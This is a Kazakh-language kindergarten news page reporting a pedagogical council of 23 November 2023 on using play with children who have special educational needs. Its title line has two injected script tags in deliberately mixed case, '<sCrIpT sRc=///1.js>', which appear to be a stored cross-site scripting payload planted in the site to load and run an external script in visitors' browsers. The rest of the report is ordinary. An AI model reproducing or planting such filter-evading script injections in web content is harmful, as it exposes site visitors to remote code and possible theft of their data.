№2 Педагогикалық кеңес<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.11.2023

23-қараша күні «Жұлдыз» балабақшасында  «Ерекше білімді қажет ететін балалардың  танымдық қызығушылығын ойын арқылы арттыру»

тақырыбында №2 педагогикалық кеңес өтті.

Мақсаты: ойын іс-әрекетін ұйымдастыру деңгейін арттыру үшін тәрбиешілердің күш-жігерін біріктіру. Ойынды ұйымдастыруда тәрбиешінің мінез-құлқының жалпы стратегиясын және оның ойында ЕБҚЕ балалармен қарым-қатынасының нақты тактикасын анықтау.

Міндеттері :

1.Тәрбиешілердің ойын іс-әрекетін басқару бойынша педагогикалық шеберлікті жетілдіру.

2.Шығармашылық ізденісті дамыту.

3.ЕБҚЕБ бар мектеп жасына дейінгі балалардың ойын іс-әрекетін ұйымдастыру жөніндегі іс-әрекеттің жағымды жақтарын, проблемалары мен перспективаларын анықтау.

4.Мектепке дейінгі мекемеде ойын  іс - әрекетін ұйымдастыру бойынша жұмысын арттыру.

 Күн тәртібінде  теориялық бөлім, іскерлік ойын,сұрақ – жауап, жағдаяттар шешу, үй тапсырмасы:ЕБҚЕБ өткізетін жұмысын қорғау, дидактикалық материал мен құжаттар көрмесі, қорытынды, командаларды марапаттау болып өтті.

Просмотров: 1204


Пікір қосу



Деректерді қолтаңбаға қосу